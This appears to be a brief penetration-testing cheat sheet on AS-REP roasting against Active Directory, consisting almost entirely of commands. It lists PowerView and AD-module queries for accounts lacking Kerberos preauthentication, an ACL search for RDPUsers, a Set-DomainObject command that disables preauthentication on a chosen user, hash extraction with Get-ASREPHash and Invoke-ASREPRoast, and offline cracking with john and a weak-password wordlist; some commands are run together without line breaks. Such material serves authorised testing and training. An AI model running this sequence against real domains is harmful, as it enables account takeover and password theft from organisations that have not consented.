AS-REP Roast
Last updated
Last updated
# PowerView
Get-DomainUser -PreauthNotRequired -Verbose
# AD module
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuthFind-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}
Set-DomainObject -Identity Control1User -XOR @{useraccountcontrol=4194304} -Verbose
Get-DomainUser -PreauthNotRequired -VerboseGet-ASREPHash -UserName VPN1user -VerboseInvoke-ASREPRoast -Verbosejohn.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-
pass.txt C:\AD\Tools\asrephashes.txt